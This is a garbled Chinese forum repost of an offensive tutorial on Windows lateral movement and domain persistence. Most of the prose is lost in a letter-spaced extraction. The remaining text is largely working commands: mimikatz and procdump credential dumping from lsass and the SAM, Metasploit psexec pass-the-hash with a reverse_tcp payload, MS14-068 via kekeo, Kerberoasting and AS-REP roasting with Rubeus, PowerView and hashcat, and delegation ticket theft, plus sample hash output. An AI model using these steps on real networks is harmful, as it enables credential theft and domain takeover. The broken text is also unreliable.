[22026] 2021-05-30_常见横向移动与域控权限维持方法

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2021-05-30_常见横向移动与域控权限维持方法 L e m o n S e c   2 0 2 1 - 0 5 - 3 0 C o n s T 2 7 P T H n t l m   h a s h n t l m   h a s h h a s h   r c 4   p a s s   t h e   h a s h a e s   k e y , p a s s   t h e   k e y N T L M k e r b e r o s P T H : N T L M k e r b e r o s c l i e n t   h a s h P T H h a s h H A S H 1 . 使 m e t e r p r e t e r m i m i k a t z 2 . 使 m e t e r p r e t e r h a s h 3 . m i m i k a t z m i m i k a t z . e x e   d u m p h a s h m i m i k a t z s h e l l m i m i k a t z s h e l l 使 .   使 c m d m i m i k a t z . e x e m i m i k a t z m i m i k a t z 4 . p r o c d u m p l s a s s . d m p m i m i k a t z d u m p p r o c d u m p . e x e l s a s s . d m p h a s h m e t e r p r e t e r > l o a d   m i m i k a t z m e t e r p r e t e r > m i m i k a t z _ c o m m a n d   - f   m i m i k a t z p r i v i l e g e : : d e b u g     s a m d u m p : : h a s h e s   d u m p   m e t e r p r e t e r > m s v / k e r b e r o s / w i d g s t m e t e r p r e t e r > h a s h d u m p m e t e r p r e t e r > r u n   w i n d o w s / g a t h e r / s m a r t _ h a s h d u m p   ( 使 ) p r o c d u m p 6 4 . e x e   - a c c e p t e u l a   - m a   l s a s s . e x e   l s a s s . d m p     l s a s s . d m p m i m i k a t z . e x e " s e k u r l s a : : m i n i d u m p   l s a s s . d m p "   " s e k u r l s a : : l o g o n P a s s w o r d s   f u l l "
P r o c d u m p h t t p s : / / d o c s . m i c r o s o f t . c o m / z h - c n / s y s i n t e r n a l s / d o w n l o a d s / p r o c d u m p m i m i k a t z h t t p s : / / g i t h u b . c o m / g e n t i l k i w i / m i m i k a t z / r e l e a s e s 5 . 使 c o b a l t   s t r i k e   h a s h 6 . s a m m i m i k a t z 线 s a m h a s h s a m m i m i k a t z h a s h     P T H   P a s s   t h e   H a s h ) 1 . m s f 使 p s e x e c 2 . 使 m i m i k a t z m i m i k a t z . e x e   便 c m d b e a c o n > h a s h d u m p b e a c o n > m i m i k a t z   m i m i k a t z p r i v i l e g e : : d e b u g t o k e n : : e l e v a t e l s a d u m p : : s a m r e g   s a v e   H K L M S Y S T E M   S Y S T E M r e g   s a v e   H K L M S A M   S A M s h e l l 使 S Y S T E M     S A M m i m i k a t z m i m i k a t z m i m i k a t z   #   l s a d u m p : : s a m   / s a m : S A M   / s y s t e m : S Y S T E M D o m a i n   :   S T U 1 S y s K e y   :   f d 4 6 3 9 f 4 e 2 7 c 7 9 6 8 3 a e 9 f e e 5 6 b 4 4 3 9 3 f L o c a l   S I D   :   S - 1 - 5 - 2 1 - 1 9 8 2 6 0 1 1 8 0 - 2 0 8 7 6 3 4 8 7 6 - 2 2 9 3 0 1 3 2 9 6 S A M K e y   :   0 9 9 d 1 9 1 5 d b 1 b 0 e 5 c f 4 1 f 1 f 0 9 0 8 d c 7 e 1 7 R I D     :   0 0 0 0 0 1 f 4   ( 5 0 0 ) U s e r   :   A d m i n i s t r a t o r     H a s h   N T L M :   3 1 d 6 c f e 0 d 1 6 a e 9 3 1 b 7 3 c 5 9 d 7 e 0 c 0 8 9 c 0 R I D     :   0 0 0 0 0 1 f 5   ( 5 0 1 ) U s e r   :   G u e s t R I D     :   0 0 0 0 0 3 e 8   ( 1 0 0 0 ) U s e r   :   l i u k a i f e n g 0 1     H a s h   N T L M :   3 1 d 6 c f e 0 d 1 6 a e 9 3 1 b 7 3 c 5 9 d 7 e 0 c 0 8 9 c 0 m s f 5   e x p l o i t ( m u l t i / h a n d l e r )   >   u s e   e x p l o i t / w i n d o w s / s m b / p s e x e c   / / r o o t m s f [ * ]   N o   p a y l o a d   c o n f i g u r e d ,   d e f a u l t i n g   t o   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p m s f 5   e x p l o i t ( w i n d o w s / s m b / p s e x e c )   >   s e t   l h s o t   1 9 2 . 1 6 8 . 6 4 . 1 3 3 l h s o t   = >   1 9 2 . 1 6 8 . 6 4 . 1 3 3 m s f 5   e x p l o i t ( w i n d o w s / s m b / p s e x e c )   >   s e t   l h o s t   1 9 2 . 1 6 8 . 6 4 . 1 3 3 l h o s t   = >   1 9 2 . 1 6 8 . 6 4 . 1 3 3 m s f 5   e x p l o i t ( w i n d o w s / s m b / p s e x e c )   >   s e t   l p o r t   4 4 3 l p o r t   = >   4 4 3 m s f 5   e x p l o i t ( w i n d o w s / s m b / p s e x e c )   >   s e t   r h o s t   1 9 2 . 1 6 8 . 5 2 . 1 3 8 r h o s t   = >   1 9 2 . 1 6 8 . 5 2 . 1 3 8 m s f 5   e x p l o i t ( w i n d o w s / s m b / p s e x e c )   >   s e t   S M B U s e r   A d m i n i s t r a t o r S M B U s e r   = >   A d m i n i s t r a t o r m s f 5   e x p l o i t ( w i n d o w s / s m b / p s e x e c )   >   s e t   S M B P a s s   8 a 9 6 3 3 7 1 a 6 3 9 4 4 4 1 9 e c 1 a d f 6 8 7 b b 1 b e 5   / / N T L M   H A S H S M B P a s s   = >   8 a 9 6 3 3 7 1 a 6 3 9 4 4 4 1 9 e c 1 a d f 6 8 7 b b 1 b e 5 m s f 5   e x p l o i t ( w i n d o w s / s m b / p s e x e c )   >   r u n s e k u r l s a : : p t h   / u s e r : a d m i n i s t r a t o r   / d o m a i n : " x x x . c o m "   / n t l m : 6 5 4 2 d 3 5 e d 5 f f 6 a e 5 e 7 5 b 8 7 5 0 6 8 c 5 d 3 b c   / /
3 . 使 c o b a l t   s t r i k e c o b a l t   s t r i k e 使 p s e x e c h a s h M S 1 4 - 0 6 8 :   s e r v e r   2 0 0 0 :   k b 3 0 1 1 7 8 0 M 1 4 0 6 8 1 . k e k e o   h t t p s : / / g i t h u b . c o m / g e n t i l k i w i / k e k e o / r e l e a s e s / t a g / 2 . 2 . 0 - 2 0 2 0 0 7 1 8 k e k e o   k e r b e r o s : : p u r g e   e x p l o i t : : m s 1 4 0 6 8   / u s e r : x x x   / p a s s w o r d : x x x   / d o m a i n : x x x   / p t t n e t   u s e   1 9 2 . 1 6 8 . 2 2 2 . 1 3 1 c $
d i r   c $   ) 2 . g o l e n p a c   h t t p s : / / g i t h u b . c o m / m a a a a z / i m p a c k e t - e x a m p l e s - w i n d o w s / b l o b / m a s t e r / g o l d e n P a c . e x e ,   s y s t e m c m d   s h e l l s y s t e m . k e r b e r o a s t K e r b e r o a s t :     T G S - R E P     S P N   线 H o w   t o   g e t   S P N S P N 1 . s e t s p n 2 . k e r b e r o a s t G e t U s e r S p n s   p o w e r s h e l l H o w   t o   g e t   H A S H h a s h 1 . R u b e u s . e x e g i t h u b c l o n e e x e .   R u b e u s . e x e   k e r b e r o a s t s e t s p n   - q   * / *
2 . m i m i k a t z m i m i k a t z   k e r b e r o s : : a s k   / t a r g e t : S P N , S T k e r b e r o s : : l i s t S T 3 . p o w e r s h e l l p o w e r s h e l l H A S H m i m i k a t z H o w   t o   e x p o r t   h a s h S T 1 . m i m i k a t z k i r b i h a s h A d d - T y p e   - A s s e m b l y N a m e   S y s t e m . I d e n t i t y M o d e l N e w - O b j e c t   S y s t e m . I d e n t i t y M o d e l . T o k e n s . K e r b e r o s R e q u e s t o r S e c u r i t y T o k e n   - A r g u m e n t L i s t   " M y S Q L / w i n 7 . x i e . c o m : 3 3 0 6 / M y S Q L "
2 . E m p i r e   P o w e r s h e l l   g i t h u b : h t t p s : / / g i t h u b . c o m / E m p i r e P r o j e c t / E m p i r e h a s h c a t h a s h . H o w   t o   c r a c k   H A S H H A S H ? 1 . H A S H C A T h a s h h a s h c a t k r i b i h a s h c a t . 2 . k e r b e r o a s t t g s r e p c r a c k . p y k r i b i H o w   t o   u s e   K e r b e r o a s t S T h a s h 便 S T . .   使 k e r b e r o a s t k e r b e r o a s t . p y A S _ R E P   R o a s t K e r b e r o a s t k e r b e r o s A S _ R E S s e s s i o n   k e y     c l i e n t   h a s h H o w   t o   g e t   H A S H 1 . R u b e u s k e r b e r o s A S R E P I m p o r t - M o d u l e   . I n v o k e - K e r b e r o a s t . p s 1 ; I n v o k e - K e r b e r o a s t   - o u t p u t F o r m a t   H a s h c a t h a s h c a t   - m   1 3 1 1 0   p a s s . t x t   h a s h . t x t p y t h o n 3   t g s r e p c r a c k . p y   p a s s . t x t   x x x . k r i b i p y t h o n   k e r b e r o a s t . p y   - p   P a s s w o r d 1 2 3   - r   P E N T E S T L A B _ 0 0 1 . k i r b i   - w   P E N T E S T L A B . k i r b i   - u   5 0 0 p y t h o n   k e r b e r o a s t . p y   - p   P a s s w o r d 1 2 3   - r   P E N T E S T L A B _ 0 0 1 . k i r b i   - w   P E N T E S T L A B . k i r b i   - g   5 1 2 # #   a d m i n i s t r a t o r k e r b e r o s : : p t t   P E N T E S T L A B . k i r b i     # R u b e u s . e x e   a s r e p r o a s t
2 . E m p i r e   A S R E P R o a s t . p s 1 使 E m p i r e p o w e r v i e w . p s 1   k e r b e r o s     A S R E P R o a s t . p s 1   h t t p s : / / g i t h u b . c o m / H a r m J 0 y / A S R E P R o a s t   A S - R E P h a s h h a s h H o w   t o   c r a c k   h a s h H A S H $ 2 3 h a s h c a t   p a s s . t x t . I m p o r t - M o d u l e   . p o w e r v i e w . p s 1   G e t - D o m a i n U s e r   - P r e a u t h N o t R e q u i r e d I m p o r t - M o d u l e   A S R E P R o a s t . p s 1 G e t - A S R E P H a s h   - U S E R   x x   - D o m a i n   x x   | O u t - f i l e   - E n c o d i n g   A S C I I   h a s h . t x t h a s h c a t   - m   1 8 2 0 0   h a s h . t x t   p a s s . t x t
使 访 访 w e b A 访 w e b w e b w e b A 访 w e b A 访 访 A K D C K D C A T G T S T S T 访 A A T G T T G T l s a s s T G T 访 访       A C L   f l a g   :   W O R K S T A T I O N _ T R U S T E D _ F O R _ D E L E G A T I O N   ( f l a g )   T G T S 4 U 2 S E L F   S 4 U 2 P R O X Y 访 S e E n a b l e D e l e g a t i o n
访 A S 4 U 2 S E L F K D C K D C A T G S _ R E S S T 1 S T S T 1 访 A A K D C T G T S T 1 S 4 U 2 P R O X Y K D C T G S _ R E Q K D C S T 2 S T A S T 2 访 S 4 U 2 S E L F N T L M A A S T 1 A A K D C T G T K D C T G T T G S _ R E Q S T 1 S T 1 S 4 U 2 S E L F k e r b e r o s K D C S T 1 S 4 U 2 P R O X Y S T 1 K D C 使   S T 2   :   使 k e r b e r o s u s e r a c c o u n t c o n t r o l   w o r k s t a t i o n _ t r u s t _ a c c o u n t .   T r u s t e d T o A u t h e n t i c a t i o n F o r D e l e g a t i o n W i n d o w s   S e r v e r   2 0 1 2 W i n d o w s   S e r v e r   2 0 1 2 W i n d o w s   S e r v e r   2 0 1 2   R 2 访 T G T l a s s a 访 d u m p 1 . S P N   s e t s p n   - U   - A   s p n _ t y p e   u s e r n a m e   s p n _ t y p e S P N M S S Q L S v c / < f q d n > : [ < p o r t >   |   < i n s t a n c e n a m e > ] < / i n s t a n c e n a m e > < / p o r t > < / f q d n > M S S Q L S v c  
< f q d n >   < / f q d n > < p o r t >     T C P   < / p o r t > < i n s t a n c e n a m e >     S Q L   S e r v e r   < / i n s t a n c e n a m e > 便   s b / c a o n i m a   . p o w e r s p l o i t p o w e r v i e w . p s 1 p o w e r v i e w g e t - n e t u s e r u n c o n s t r a i n e d   G e t - N e t U s e r   - S P N   G e t - d o m a i n c o m p u t e r u s e r a c c o u n t c o n t r l t r u s t e d _ f o r _ d e l e g a t i o n , 2 . t g t 访 使 m i m i k a t z , 访 T G T s m b G e t - N e t U s e r   - U n c o n s t r a i n e d   - D o m a i n   d e 1 a y . c o m G e t - d o m a i n c o m p u t e r   - u n c o n s t r a i n e d   - d o m a i n   c o n s t . c o m p r i v i l e g e : : d e b u g s e k u r l s a : : t i c k e t s
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则